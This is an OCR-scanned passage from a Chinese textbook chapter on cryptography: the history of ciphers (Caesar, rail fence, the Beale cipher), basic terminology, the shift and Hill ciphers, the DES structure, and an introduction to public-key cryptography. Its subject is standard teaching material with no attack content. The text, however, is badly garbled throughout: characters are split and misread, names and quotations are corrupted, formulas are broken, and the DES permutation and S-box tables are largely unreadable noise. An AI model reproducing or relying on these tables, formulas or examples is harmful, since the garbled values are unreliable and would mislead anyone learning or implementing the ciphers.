安全 管理 技术 。 负 责 用 户 密 钥 管理 、 公 证 和 仲裁 。 

安全 审计 技术 。 对 系统 中 的 用 户 有 关 操 作 做 日 志和 记录 。 

灾难 恢复 技术 。 一 旦 系统 出 现 问题 ， 可 对 系统 恢复 。 

防 病毒 技术 。 

边界 安全 技术 。 采 用 防火 墙 等 技术 对 非法 用 户 或 站 点 的 访问 进行 控制 。 
入 侵 报警 技术 。 
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。 ” 公 钥 和 私 钥 密码 体制 
。 数字 签名 
@ ”数字 证 书 
@ ”身份 认证 


2.1 密码 学 基础 


我 们 今天 正 处 于 密码 学 发 生 重大 变革 的 时 代 。 
W.Diffe 和 M.E.Hellman 
突然 ， 现 代 密 码 学 从 半 军 事 的 角落 里 解脱 出 来 ， 一 跃 成 为 通信 科学 一 切 领 域 中 的 中 心 
研究 课题 。 
T.Beth 
密码 学 是 一 门 既 古老 又 新 兴 的 学 科 , 自古 以 来 就 在 军事 和 外 交 舞台 上 担当 着 重要 角色 。 
长 期 以 来 ， 密 码 技术 作为 一 种 保密 手段 ， 本 身 也 处 于 秘密 状态 ， 只 被 少数 人 或 组 织 掌握 。 
随 着 计算 机 网 络 和 计算 机 通信 技术 的 发 展 ， 计 算 机 密码 学 得 到 了 前 所 未 有 的 重视 并 迅速 普 
及 和 发 展 起 来 ， 成 为 计算 机 安全 领域 的 主要 研究 方向 。 


2.1.1 ”加 密 的 起 源 


早 在 4000 多 年 以 前 , 在 古 埃 及 的 尼罗河 畔 , 一 位 擅长 书写 者 在 贵族 的 墓碑 上 撰写 铭文 
时 有 意 用 加 以 变形 的 象形 文字 而 不 是 普通 的 象形 文字 ， 这 是 史 载 的 最 早 的 密码 形式 。 

罗马 “历史 之 父 ” 希 罗 多 德 以 编 年 史 的 形式 记载 了 公元 前 五 世纪 希腊 和 波斯 间 的 冲突 ， 
其 中 介绍 到 正 是 由 于 一 种 叫 隐 写 术 的 技术 才 使 希腊 兔 遭 波斯 暴君 薛 西 斯 一 世 征 服 的 龙 运 。 
薛 西 斯 花 了 足 足 5 年 的 战争 准备 ， 计 划 于 公元 前 480 年 对 希腊 发 动 一 场 出 其 不 意 的 进攻 。 
但 是 波斯 的 野心 被 一 名 逃亡 在 外 的 希腊 人 德 马 拉 图 斯 发 现 了 ， 他 决定 给 斯 巴 达 带 去 消息 以 
告诉 他 们 薛 西 斯 的 侵犯 企图 。 可 问题 是 消息 怎样 送出 才 不 被 波斯 士兵 发 现 。 他 利用 一 副 已 
上 蜡 的 可 折 且 刻写 板 ， 先 将 消息 刻写 在 木板 的 背面 ， 再 涂 上 蜡 盖 住 消 息 ， 这 样 刻写 板 看 上 
去 没 写 任何 字 。 最 终 希 腊 人 得 到 了 消息 ,并 提前 做 好 了 战争 准备 ， 致 使 莅 西 斯 的 侵略 失败 。 
德 马 拉 图 斯 的 保密 做 法 与 中 国 古 人 有 异曲同工 之 妙 。 中 国 古 人 将 信息 写 在 小 块 丝绸 上 ， 寨 
进 一 个 小 球 里 ， 再 用 蜡 封 上 ， 然 后 让 信使 奉 下 这 个 蜡 球 以 保证 信息 安全 。 


J EPE 


最 早 将 现代 密码 学 概念 运用 于 实际 的 人 是 恺 撤 大 帝 ( 尤 利 西 斯 恺 搬 ， 公 元 前 100 一 前 
44 年 )。 他 不 相信 和 负责 他 和 他 手下 将 领 通信 的 传令 官 ， 因 此 他 发 明了 一 种 简单 的 加 密 算法 
把 他 的 信件 加 密 ， 后 来 被 称 为 “ 恺 撤 密 码 ”。 当 恺 撤 说 “Hw wx，Euxwh! ”而 不 是 “Ettu， 
Bmte! ”(“ 你 这 畜生 ! ”) 时 ， 他 的 心腹 会 懂得 他 的 意思 。 值 得 注意 的 是 ， 大 约 2000 年 后 ， 
联邦 将 军 A.S. 约 翰 逊 和 皮 埃 尔 。 博 雷 加 德 在 希 洛 战斗 中 再 次 使 用 了 这 种 简易 密码 。 恺 撤 密 
码 是 将 字母 按 字母 表 的 顺序 排列 ， 并 且 最 后 一 个 字母 与 第 一 个 字母 相连 。 加 密 方法 是 将 明 
文中 的 每 个 字母 用 其 后 面 的 第 三 个 字母 代替 ， 就 变 成 了 密 文 。 例 如 : 


证 和 


的 恺 撤 密 码 是 : 
PHHWDWWROQALIKVW 
以 英文 为 例 ， 恺 撤 密码 的 代替 表 如 表 2-1 所 示 。 


表 2-1 恺 撤 密码 代替 表 
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[oo 
[oslslilvolvIwix|y|z|slsie 
千 百 年 来 ， 人 们 运用 自己 的 智慧 创造 出 了 形形色色 的 编写 密码 的 方法 ， 下 面 介绍 几 种 
简易 的 密码 方案 。 
例如 ， 给 出 密 文 ， 


KCATTA WON 
你 能 猜 出 它 是 什么 意思 吗 ? 我 们 只 要 将 每 个 单词 倒 过 来 读 ， 就 会 迅速 恢复 明文 : 
attack now 


在 美国 南北 战争 时 期 ， 军 队 中 曾经 使 用 过 “双轨 ” 式 密 码 ， 加 密 时 先 将 明文 写成 双轨 
的 形式 ， 例 如 将 attack now 写成 : 


然后 按 行 的 顺序 书写 即 可 得 出 密 文 : 

ATCNWTAKO 
解密 时 ， 先 计算 密 文 中 字母 的 总 数 ， 然 后 将 密 文 分 成 两 部 分 ， 排 列 成 双轨 形式 后 按 列 的 顺 
序 读 出 即 可 恢复 明文 。 

在 第 一 次 世界 大 战 期 间 ， 德 国 间 谍 曾 经 依靠 字典 编写 密码 。 例 如 100-3-16 表示 某 字 典 
的 第 100 页 第 3 段 的 第 16 个 单词 但是, 这 种 加 密 方法 并 不 可 靠 , 美国 情报 部 门 搜集 了 所 
有 德 文字 典 ， 只 用 了 几 天 时 间 就 找 出 了 德 方 所 用 的 那 一 本 ， 从 而 破译 了 这 种 密码 ， 致 使 德 
军 损失 惨重 。 

以 上 介绍 了 几 种 简易 的 密码 形式 ， 这 些 早 期 的 密码 多 数 应 用 于 军事 、 外 交 、 人 情报 等 敏 
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感 的 领域 。 而 由 于 军事 、 外 交 和 情报 等 方面 的 需要 ， 也 刺激 了 密码 学 的 发 展 。 密 码 编写 得 
好 与 坏 ， 有 时 会 产生 重大 的 甚至 决定 性 的 影响 。 例 如 ， 第 二 次 世界 大 战 期 间 ， 英 国情 报 部 
门 在 一 些 波兰 人 的 帮助 下 ， 于 1940 年 破译 了 德国 直至 1944 年 还 自 认为 是 可 靠 的 Enigma 
密码 系统 ， 使 德 方 遭受 重大 损失 。 

计算 机 的 出 现 ， 大 大 地 促进 了 密码 学 的 变革 ， 正 如 德国 学 者 T.Beth 所 说 : “突然 , 现 
代 密 码 学 从 半 军 事 性 的 角落 里 解脱 出 来 ,一 跃 成 为 通信 科学 一 切 领域 中 的 中 心 研究 课题 。” 
由 于 商业 应 用 和 大 量 计算 机 网 络 通信 的 需要 ， 人 们 对 数据 保护 、 数 据 传输 的 安全 性 越 来 越 
重视 ， 这 更 大 地 促进 了 密码 学 的 发 展 与 普及 。 

密码 学 的 发 展 大 致 可 分 为 以 下 几 个 阶段 。 

第 一 阶段 从 古代 到 1949 年 ， 这 一 时 期 ， 密 码 学 家 往往 赁 直觉 设计 密码 ， 缺 少 严 格 的 推 
理 证 明 。 这 一 阶段 设计 的 密码 称 为 古典 密码 。 

第 二 阶段 从 1949 一 1975 年 ， 这 一 时 期 发 生 了 两 个 比较 大 的 事件 。1949 年 信息 论 大 师 
Shannon 发 表 了 “保密 系统 的 信息 理论 ”一 文 ， 为 密码 学 黄 定 了 理论 基础 ， 使 密码 学 成 为 
- 门 真正 的 科学 。1970 年 由 IBM 研究 的 密码 算法 DES 被 美国 国家 标准 局 宣布 为 数据 加 密 
标准 ， 这 打破 了 对 密码 学 研究 和 应 用 的 限制 ， 极 大 地 推动 了 现代 密码 学 的 发 展 。 

第 三 阶段 从 1976 年 至 今 。1976 年 Diffie 和 Hellman 发 表 的 “密码 学 的 新 方向 ”一 文 
开创 了 公 钥 密码 学 的 新 纪元 ， 在 密码 学 的 发 展 史上 具有 里 程 碑 的 意义 。 

比尔 密码 之 谜 一 一 1820 年 1 月 ， 一 个 陌生 人 骑马 来 到 弗吉尼亚 林 奇 堡 的 华盛顿 旅馆 。 
他 自我 介绍 说 他 叫 Thomas.Jefferson Bl。 同年 的 3 月 底 ， 在 给 旅馆 老板 Morris 留 下 了 一 个 
锁 着 的 铁 盒 后 ， 他 一 声 不 响 地 离开 了 这 家 旅馆 。 

Morris 直到 1845 年 才 打开 那个 盒子 。 他 发 现 里 面 有 两 封 写 给 他 的 信和 三 张 写 满 一 连 串 
数字 的 难以 理解 的 文件 。 在 信 中 比尔 详细 叙述 了 他 与 他 的 伙伴 在 冒险 活动 中 毛发 现 的 巨 量 
黄金 ， 并 把 它们 藏 在 贝 德 福 德 县 的 布 法 德 酒馆 附近 的 一 个 山洞 里 。 并 且 信 中 写 道 ， 如 用 特 
定 的 密 钥 破译 出 那 三 张 文 件 ， 就 会 揭示 出 隐藏 处 的 确切 地 点 、 贮 藏 处 具体 所 藏 之 物 以 及 30 
个 冒险 家 的 姓名 和 地 址 。 

盒子 中 的 东西 无 疑 勾 起 了 Morris 的 好 奇 心 。Morris 在 其 一 生 余 下 的 19 年 中 致力 于 发 
现 财宝 , 但 由 于 没有 那 份 神秘 文件 的 密 钥 而 未 有 任何 进展 。 在 他 临终 前 的 1863 年 ， 他 把 那 
只 盒子 的 事 告诉 了 James. Woodard。Woodard 起 初 同样 对 密码 一 筹 莫 展 ， 直 到 他 灵光 一 现 ， 
想到 要 用 《独立 宣言 》 作 为 密 钥 。Woodard 的 做 法 是 给 《独立 宣言 》 中 每 个 单词 的 第 一 个 
字母 进行 编号 。 例 如 ， 他 为 前 9 个 单词 进行 编号 ， 并 从 这 些 单词 中 发 现 l=W，2=I，3=T， 
4-0，5=C，6-=H，7-E，8=-I，9=-B。 可 以 看 到 比尔 有 两 种 办 法 为 字母 I 加 密 : 2 或 8。 等 到 
给 整个 《独立 宣言 》 编 号 之 后 ， 他 对 许多 字母 无 疑 就 有 了 很 多 的 选择 。 通 过 自由 运用 这 些 
选择 ， 他 借助 频率 分 析 法 破译 难以 译 出 的 密码 文 。 这 样 ， 由 于 Woodard 碰巧 发 现 了 适当 的 
密 钥 《独立 宣言 》， 从 而 破译 了 比尔 密码 的 第 二 页 ， 推 断 出 下 列 一 段 文 字 : “我 在 离 
布 法 德 约 4 英里 处 的 贝 德 福 德 县 里 的 一 个 离 地 面 6 英尺 深 的 洞穴 或 地 容 中 贮藏 了 下 列 物 品 ， 
这 些 物品 为 各 队员 (他 们 的 名 字 在 后 面 第 三 张 纸 上 ) 公 有 。 第 一 窖藏 有 1014 磅 金子 ，3812 磅 
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银子 ， 藏 于 1819 年 11 月 。 第 二 窖藏 有 1907 磅 金子 ，1288 磅 银子 。 另 有 在 圣 路 易 为 确保 
运输 而 换 得 的 珠宝 ……” 

这 段 文字 极 大 地 激发 起 Woodard 的 兴趣 ， 他 耗 尽 余生 去 破译 其 余 密码 ， 但 一 无 所 获 。 

20 世纪 60 年 代 ， 一 些 密码 分 析 界 最 富有 智慧 的 人 组 成 了 一 个 秘密 协会 一 一 比尔 密码 
协会 ， 他 们 倾 其 知识 和 才智 去 寻找 那 堆 难 以 捉摸 的 财富 。 计 算 机 科学 家 、 计 算 机 密码 统计 
性 分 析 的 先驱 卡尔 。 哈 默 就 是 该 协会 的 一 位 著名 成 员 ， 他 对 比尔 文件 中 的 数字 的 分 布 做 了 
大 量 统计 、 试 验 ， 总 结 得 出 : 这 些 数字 并 不 是 随意 写 出 的 ， 一 定 隐 含 着 一 段 英文 信息 。 

虽然 越 来 越 多 的 数学 家 从 事 密码 学 研究 ， 越 来 越 多 的 巨型 计算 机 被 用 来 编制 和 破译 密 
码 , 但 一 个 半 世 纪 前 写成 的 比尔 密码 一 一 它 暗示 在 某 个 地 方 藏 有 1700 万 美元 的 财富 ,依然 
耗 去 了 “美国 最 有 能 耐 的 密码 分 析 家 至 少 10% 的 精力 ”。 时 至 今日 ， 比 尔 密码 仍然 是 一 
个 谜 。 


2.1.2 ”密码 学 的 基本 概念 


密码 学 的 基本 目的 是 使 得 两 个 在 不 安全 信道 中 通信 的 人 ， 我 们 称 为 A 和 B， 以 一 种 使 
他 们 的 敌手 C 不 能 明白 和 理解 通信 内 容 的 方式 进行 通信 。 不 安全 信道 在 实际 中 是 普遍 存在 
的 ， 比 如 电话 线 或 计算 机 网 络 。A 发 送 给 B 的 信息 ， 通 常 称 为 明文 plaintexb， 即 未 被 加 密 
的 信息 ， 例 如 英文 单词 、 数 据 或 符号 。A 使 用 预先 商量 好 的 密 钥 (key) 对 明文 进行 加 密 ， 加 
密 过 的 明文 称 为 密 文 (ciphertext)，A 将 密 文通 过 信道 发 送 给 B。 对 于 敌手 C 来 说 ， 他 可 以 
窃听 到 信道 中 A 发 送 的 密 文 ， 但 是 无 法 知道 其 所 对 应 的 明文 ， 而 对 于 接收 者 也 ， 由 于 知道 
密 钥 ， 可 以 对 密 文 进行 解密 ， 从 而 获得 明文 。 图 2-1 给 出 密码 通信 的 基本 过 程 。 


" 明文 
加 密 算法 解密 算法 


图 2-1 密码 通信 的 基本 过 程 
密码 通信 过 程 中 涉及 的 基本 概念 如 下 。 
。 明文 消息 plaintexb: 需要 变换 的 原 消 息 。 简 称 明文 。 
。 ” 密 文 消息 (ciphertext): 明文 经 过 变换 成 为 的 一 种 隐蔽 形式 。 简 称 密 文 。 
e ”加 密 (encipher、encode): 完成 明文 到 密 文 的 变换 过 程 。 
e 解密 (decipher、decode): 从 密 文 恢复 出 明文 的 过 程 。 
。 ”加 密 算法 (cipher): 对 明文 进行 加 密 时 所 采用 的 一 组 规则 的 集合 。 
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。 ”解密 算法 (cipher): 对 密 文 进行 解密 时 所 采用 的 一 组 规则 的 集合 。 

。 ”密码 算法 强度 ， 对 给 定 密码 算法 的 攻击 难度 。 

。 密 钥 (key): 加 解密 过 程 中 只 有 发 送 者 和 接收 者 知道 的 关键 信息 。 

密码 算法 是 指 用 于 加 密 和 解密 的 一 对 数学 函数 E(x) 和 DG)。 研 究 如 何 构造 密码 算法 ， 
使 窃听 者 在 合理 的 时 间 和 代价 下 不 能 破译 密 文 以 获取 原始 明文 消息 的 理论 和 方法 称 为 密码 
编码 学 。 与 之 对 应 的 ， 研 究 在 未 知 密码 算法 的 前 提 下 ， 对 获取 的 密 文 进行 分 析 、 破 解 ， 从 
中 获取 原始 明文 消息 的 理论 和 方法 称 为 密码 分 析 学 。 总 而 言 之 ， 密 码 学 = 密码 编码 学 + 密码 
分 析 学 。 

什么 是 密码 系统 呢 ? 以 2.1.1 节 介绍 的 已 撤 密 码 为 例 ， 如 果 我 们 用 数字 0、1、2、.…、 
24、25 分 别 和 字母 A、B、C、...、Y、Z 相对 应 ， 如 表 2-2 所 示 。 


表 2-2 子 母 与 数字 对 应 表 


字母 | nm 


则 密 文字 母 8 可 以 用 明文 字母 a 表示 如 下 : 
b=at3(mod 26) (2-1) 
例如 ， 明 文字 母 为 ce， 即 a=2 时 : 
b=2+3=5(mod 26) 
因此 ， 密 文字 母 为 F。 

式 (2-D) 是 恺 撤 密码 的 数学 形式 ， 也 表示 一 种 算法 ， 恺 撤 密 码 系统 即 由 式 (2-0) 和 其 中 密 
钥 3 组 成 。 我 们 不 知道 当时 恺 撤 为 什么 偏爱 数字 3， 他 其 实 可 以 选择 1 一 25 之 间 的 任何 一 
个 数字 作为 密 钥 。 因 此 ， 式 (2-1) 可 以 推广 成 : 

b=at+k(mod 26) (2-2) 
这 其 实 就 是 移 位 密码 。 这 里 ，kEK，K={1,2,3,…,24,25},， 玫 是 密 钥 集合 ， 或 称 密 钥 空间 。 
定义 2.1 一 个 密码 体制 是 满足 以 下 条 件 的 五 元 组 (P,C,K,E,D)， 满 足 条 件 : 

(1) 书 是 所 有 可 能 的 明文 组 成 的 有 限 集 (明文 空间 ); 

(2) C 是 所 有 可 能 的 密 文 组 成 的 有 限 集 ( 密 文 空间 ); 

(3) 天 是 所 有 可 能 的 密 钥 组 成 的 有 限 集 ( 密 钥 空间 ); 

(4) 任意 keEK， 有 一 个 加 密 算法 eEE 和 相应 的 解密 算法 de D， 使 得 e 和 4 分 别 为 加 
密 和 解密 函数 ， 满 足 d(e(x))=x， 这 里 xEP。 

上 述 移 位 密码 的 密码 体制 描述 如 下 : 

密码 体制 2.1 移 位 密码 

令 P=C=K={1,2,3,…,25,26}。 对 0 和 上 生 25， 任 意 xyE {1,2,3,…,25,26}， 定 义 

eCD)=(CcHbmod 26 
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以 及 
ao)=O-Dmod 26 
算法 是 一 些 公式 、 法 则 或 程序 ， 它 规定 明文 和 密 文 之 间 的 变换 方法 ; 密 钥 可 以 看 成 是 
算法 中 的 参数 。 例 如 在 式 (2-2) 中 取 左 3， 就 可 以 得 到 式 (2-1)， 即 恺 撤 密 码 。 如 果 取 k=25， 
就 可 以 得 出 美军 多 年 前 使 用 过 的 一 种 加 密 算法 ， 即 通过 明文 中 的 字母 用 其 前 面 的 字母 取代 
形成 密 文 的 方法 。 例 如 ， 当 明文 是 : 


attacknow 
时 ， 则 对 应 的 密 文 是 : 
ZSSZBJMNV 
密码 体制 2.2 希 尔 密码 
设 m 宇 2 为 正 整 数 ，P=C={1,2,3,…,25,26}”， 且 
下 ={ 定 义 在 {1,2,3,…,25,26} 上 的 mxm 可 道 和 矩阵 } 

对 任意 的 密 钥 ， 定 义 加 密 变 换 : 

e(¥)=kr 
解密 变换 : 

dEYy 


| 
例如 : 选取 2x2 的 密 钥 ， | | 


明文 mw='Hil 
矩阵 形态 机 | 2 | 
1 1 8 11 


EH Bl Ls: 22 1s. 22 
加 密 过 程 | | | 二 有 区 26) 
3 雪 |8 21 53:.:77 E25 


所 以 密 文 C=| 5 22| -|P WW|， 好 窗 文 C-pPBWZ 
1 25 和 之 


算法 是 相对 稳定 的 ， 我 们 不 能 想象 在 一 个 密码 系统 中 经 常 改变 的 加 密 算法 ， 在 这 种 意 
义 上 可 以 把 算法 视 为 常量 。 反 之 ， 密 钥 则 是 一 个 变量 ， 为 了 密码 系统 的 安全 ， 频 繁 更 换 密 
钥 是 必要 的 。 我 们 可 以 根据 事前 约定 ， 用 过 若干 次 后 改变 一 个 密 钥 ， 或 者 每 过 一 段 时 间 后 
更 换 一 次 密 钥 等 。 由 于 种 种 原因 ， 算 法 往往 不 能 够 保密 ， 因 此 ， 我 们 常常 假定 算法 是 公开 
的 ， 真正 需要 保密 的 是 密 钥 ， 所 以 ， 在 分 发 和 存储 密 钥 时 应 当 特 别 小 心 。 


2.1.3 ”对 称 密 钥 算 法 


对 称 密 钥 算法 又 称 为 传统 密 钥 算法 ， 加 密 密 钥 能 够 从 解密 密 钥 中 推算 出 来 ， 反 过 来 也 
成 立 。 在 大 多 数 对 称 算法 中 ， 加 解密 的 密 钥 是 相同 的 。 典 型 的 对 称 密 钥 算 法 是 DES、AES 
和 RC5 算法 。 实 际 上 ， 前 面 介绍 的 古典 密码 (包括 移 位 密码 、 希 尔 密 码 和 置换 密码 等 ) 也 可 
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看 作 是 对 称 密 钥 算法 。 图 2-2 表示 了 对 称 密 钥 算法 的 基本 原理 。 


2-2 对称 密 钥 算 法 的 基本 原理 


明文 经 过 对 称 加 密 算法 处 理 后 ， 变 成 了 不 可 读 的 密 文 ( 即 乱 码 )。 如 果 想 解读 原文 ， 则 
需要 使 用 同样 的 密码 算法 和 密 钥 来 解密 ， 即 信息 的 加 密 和 解密 使 用 同样 的 算法 和 密 钥 。 对 
称 密码 算法 的 优点 是 计算 量 小 、 加 密 速度 快 。 

对 于 对 称 密码 体制 来 说 ， 可 以 按照 对 明文 加 、 解 密 的 方式 ， 将 其 分 为 序列 密码 (或 流 密 
码 ) 和 分 组 密码 。 序 列 密码 是 将 明文 划分 成 字符 (如 单个 字母 或 其 编码 的 基本 单元 (如 0，1 
数字 ), 逐 字 符 进行 加 、 解密。 分 组 密码 是 将 明文 编码 表示 后 的 数字 序列 划分 成 长 为 m 的 组 ， 
各 组 分 别 在 密 钥 的 控制 下 加 密 成 密 文 。 分 组 密码 模型 如 图 2-3 所 示 。 

密 钥 三 (ko…,hr1) 密 钥 三 (io ….borD 


明文 


Go…xD 


图 2-3 分 组 密码 模型 

毫 无 疑问 ， 数 据 加 密 标准 (DES) 中 的 算法 是 第 一 个 并 且 也 是 最 重要 的 对 称 加 密 算法 。 
DES 算法 最 初 是 由 IBM 公司 在 1970 年 左右 开发 出 来 的 ，1977 年 被 美国 选 为 国家 标准 。 值 
得 注意 的 是 ，IBM 提交 的 候选 算法 的 密 钥 长 度 为 112 位 ， 但 是 美国 国家 安全 局 (NAS) 公 布 
的 DES 算法 的 密 钥 长 度 为 56 位 。 因 此 ， 人 们 曾经 怀疑 DES 的 安全 强度 ，NAS 是 否 在 其 中 
设置 了 陷 门 。 但 无 论 如 何 ，DES 得 到 了 包括 金融 业 在 内 的 广泛 使 用 ， 同 时 对 DES 安全 性 的 
研究 也 在 不 断 继续 。 

DES 的 明文 分 组 长 度 为 64 位 ， 密 钥 长 度 56 位 , 输出 64 位 密 文 分 组 ， 其 加 密 算法 框图 
如 图 2-4 所 示 。 图 的 左 部 是 明文 的 加 密 处 理 过 程 ， 该 过 程 分 为 3 个 阶段 。 

(1) 给 定 明文 筷 通过 一 个 固定 的 初始 置换 他 来 排列 全 中 的 位 ， 得 到 各。 

XIPCO=ZoRo 
其 中 由 名 前 32 位 组 成 ,Ro 由 加 的 后 32 位 组 成 。 
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(2) 计算 函数 下 的 16 次 迭代 ， 根 据 下 述 规 则 来 计算 LiRA1<i<16)。 
LaiRi, RL ® TR, Ki) 
其 中 下 是 长 为 48 位 的 子 密 钥 。 子 密 钥 Ki, Kz,，…, Ki6 是 作为 密 钥 K(56 位 ) 的 函数 而 计 
算出 的 。 
(3) 对 LieRi6 使 用 逆 置 换 IP 得 到 密 文 了 。 
=IP ‘(LieR10) 


输入 64 比 特 明文 数据 


在 密 钥 控制 下 
16 轮 和 欠 代 产生 16 个 密 钥 
初始 逆 置 换 IP 
输出 64 比 特 密 文 数据 


2-4 ”DES 加 密 算法 框图 
DES 算法 中 的 初始 置换 IP 和 逆 置 换 人! 如 表 2-3 所 示 。 
表 2-3 “初始 置换 和 着 置换 


初始 置换 IP 初始 逆 置 换 IP” 
58 50 42 34 26 18 10 48 16 56 24 64 32 
60 52 44 36 28 20 12 4 47 15 55 23 63 31 
62 54 46 38 30 22 14 6 38 
8 


所 


46 14 54 22 62 30 
64 56 48 40 32 24 16 
44 12 52 20 60 28 
要 | 3 归 59 2 


57 49 41 33 25 17 9 
:> | .| | 


by 


3 
7 
6 
条 3 枯 嘿 光 妈 页 为 
4 
和 
- 


6L 53 4$3 37 29 21 13 42 10 50 18 58 26 


33 1 41 9 49 17 57 25 


-| | 
» 
Eg 


3353 3 23 二 

DES 算法 的 每 次 迭代 中 ， 首 先 将 64 比特 信息 分 为 独立 的 左右 32 比特 信息 Li1、Rii， 
该 轮 处 理 的 总 体 效果 是 LRi1, RELi1 旬 F(Ri, RD) 其 中 的 FOR KK) 称 为 轮 函数 或 函数 ， 
处 理 细节 如 图 2-5 所 示 ， 其 中 包括 扩展 置换 EE、S 盒 及 置换 P。 扩 展 置换 EE 如 表 2-4 所 示 ， 
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置换 函数 己 如 表 2-5 所 示 。 


RG2 比特 ) 
48 比特 K(48 比特 ) 
>D« T 
y 
[I | | 
| | Ss i ] ( EE Cs |l : ][( 5s Cs ] 
32 比特 
2-5 轮 函 数 
表 2-4 扩展 置换 E 


从 图 2-5 中 可 见 ， 轮 函数 中 共有 8 个 5S 盒 ， 每 一 个 8 盒 都 接受 6 个 比特 作为 输入 并 产 
生 4 个 比特 作为 输出 , S 盒 如 表 2-6 所 示 。 输入 的 第 一 和 最 后 一 个 比特 构成 一 个 2 位 二 进 制 
数 ， 用 来 选择 由 5; 表 中 选 出 一 行 ， 中 间 的 4 个 比特 则 选 出 一 列 。 即 S(b1b6, b2b3b4b5) 选 择 
S 盒 中 的 一 个 数 。 例 如 Si 的 输入 为 100111, 则 输出 为 S: 中 的 第 3 行 第 3 列 的 值 (2)1o=(0010)。 。 
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表 2-6 DES 中 S 盒 的 定义 


主 小 关山 豫 放 王政 询 上 sumls|alnol 上 划 司 医 轴 医 国 区 仙 本 4 
届 医 滞 医 而 攻 加 区: 下 际 届 横 : 汪 本 国医 月 攻 区 攻 5 司 本国 慰 且 医 油 医 避 医 : 
| 
区 由 训 :由 深 小 立 3|114|110|10|16|1»3B 
禹 由 是 小 汤 | 竹 zw3lBlols|w 
区区 到 医 r: 10|6|9|1|5 
0 | 14|7|1 6|9|3|，: |15 
i | 开山 动 -| 六 这 2 太志 -| 小 汐 
10|0 |9|14 区 | 居 攻 加 攻 划 了 区: 
13|7|o|9 1 iz | 让 二 i 
13|16|14|9 l12|5|1o|1141|7 
1 | i i131 6 让 证 小 党 小 去 小 入 
7|13|114|3 | 下 | | 
到 区 二 区 则 医 : 12|1|10|14|9 
10|16|19|0 直属 - 光 医 浊 昨 国医: 
3 |15|o|56 | | 
本 | | 二 下 注 15|113|0|14|9 
这 山名 上 这 汪 记 10|3|19|81|56 
到 医 汉 十 测 医 \| | 6 | 水 让 种 小 放 
和 小 -全 | 入 小 汉 9110|41513 
这 | 证 直 多才 御 4|14|71|15|1 
0 | 5 4 2 i 6 | a | 3 8 
9|114|15|5 10|1|13|ul|s 
二 小 守 .| 这 浅 各 国医 调 医 加 甘地 区 
半 小 名 -| 蕊 站 嘿 | 
区 :天桥 | 本国 村 汪 区 .二 医 测 医 : 
| 不 入 | 季 二 区 国医 淹 攻 国 攻 : 
Bi | 国医 国医 湖区 2 
入 由 注 1 有 | 济 名 3 二 收 衣 小 澡 
| i | i l1|o|14|9|: 
Fl lls lwlial2|l1 lwlBIls|I3|s|s 
魏征 并 麻 | 洪 中 多 让 六 让 葵 上 | 瑟 这 | 上 多 各 | 各 | 过 泛 
关于 DES 算法 的 安全 强度 问题 , 一直 是 人 们 关心 的 问题 。 围 绕 该 问题 的 研究 大 体 从 算 
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法 的 性 质 和 密 钥 长 度 两 方面 展开 ,其 中 最 突出 的 问题 是 DES 的 密 钥 长 度 较 短 。 克 服 短 密 钥 
缺陷 的 一 个 解决 办 法 是 使 用 不 同 的 密 钥 ， 多 次 运行 DES 算法 ， 这 样 的 方案 称 为 三 重 DES 
方案 。DES 的 短 密 钥 弱点 在 20 世纪 90 年 代 就 变 得 明显 了 。1998 年 7 月 1 日， 密码 学 研究 
会 花 了 不 到 250000 美元 构造 了 一 个 称 为 DES 解密 高 手 的 密 钥 搜 索 机 , 仅仅 搜索 了 56 小 时 
就 成 功 地 找到 了 DES 的 密 钥 。 

2000 年 10 月 2 日 , 美国 国家 标准 局 宣布 选中 了 Rijndael 作为 高 级 加 密 标准 (AES) 取 代 
DES， 从 此 DES 作为 一 项 标准 正式 结束 ， 但 是 在 许多 非 机 密级 的 应 用 中 ，DES 仍 在 广泛 
使 用 。 

正如 DES 标准 吸引 了 许多 试图 攻破 该 算法 的 密码 分 析 家 的 注意 , 并 促进 了 分 组 密码 分 
析 的 认识 水 平 的 发 展 一 样 , 作为 新 的 分 组 密码 标准 的 AES 也 将 再 次 引起 分 组 密码 分 析 中 的 
高 水 平 研究 ， 这 必 将 使 得 人 们 在 该 领域 的 认识 水 平 得 到 进一步 的 提高 。 

2.1.4 公开 密 钥 算法 

对 于 对 称 密码 而 言 ， 由 于 解密 密 钥 和 加 密 密 钥 相同 ， 所 以 对 称 密码 的 缺点 之 一 就 是 ， 
它 需 要 在 A 和 B 传输 密 文 之 前 使 用 一 个 安全 的 通道 交换 密 钥 。 实 际 上 ， 这 可 能 很 难 达到 。 
例如 ，A 和 了 B 相距 遥远 ， 他 们 决定 用 E-mail 通信 ， 在 这 种 情况 下 ，A 和 了 B 可 能 无 法 获得 一 
个 相对 安全 的 通道 。 对 称 密码 的 另 一 个 缺点 是 要 分 发 和 管理 的 密 钥 很 多 ， 假 设 网 络 中 每 对 
用 户 使 用 不 同 的 密 钥 ， 那 么 密 钥 总 数 随 着 用 户 的 增加 而 迅速 增加 。7” 个 用 户 需 要 的 密 钥 总 
数 为 n(n-1)/2，10 个 用 户 需要 45 个 密 钥 ，100 个 用 户 就 需要 4950 个 不 同 的 密 钥 。 正 是 为 
了 克服 对 称 密码 的 这 两 个 缺点 ， 公 开 密 钥 算法 就 产生 了 。 

公开 密 钥 算法 于 1976 年 由 Diffie 和 Hellman 提出 。 这 一 体制 的 最 大 特点 是 采用 两 个 密 
钥 将 加 密 和 解密 能 力 分 开 : 一 个 公开 作为 加 密 密 钥 ; 一 个 为 用 户 专用 ， 作 为 解密 密 钥 ， 通 
信 双 方 无 须 先 交 换 密 钥 就 可 以 进行 通信 。 从 公开 的 公 钥 或 密 文 来 分 析 明 文 或 者 密 钥 ， 在 计 
算 上 是 不 可 行 的 。 公 钥 密码 的 思想 如 图 2-6 所 示 。 


图 2-6 ” 公 钥 密码 的 思想 
自 1976 年 公 钥 密 码 体制 被 提出 之 后 ，MIT 三 位 年 青 数学 家 RL.Rivest、A.Shamir 和 
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L.Adleman 发 现 了 一 种 用 数论 构造 双 钥 的 方法 , 称 作 MIT 体制 ,后 来 被 广泛 称 为 RSA 体制 。 
随后 多 种 公 钥 密码 体制 被 提出 ， 并 且 每 一 种 公 钥 密码 体制 都 是 基于 不 同 的 数学 难题 。 其 中 
最 著名 的 是 : RSA 密码 体制 ， 其 安全 性 基于 分 解 大 整数 的 困难 性 ，ElGamal 密码 体制 ， 其 
安全 性 基于 离散 对 数 问题 。 下 面 介 绍 RSA 密码 体制 。 

在 介绍 RSA 密码 体制 之 前 , 需要 首先 考虑 陷 门 单 向 函数 ,什么 是 陷 门 单 向 函数 ? 我 们 
现在 给 出 它 的 非 正式 定义 。 

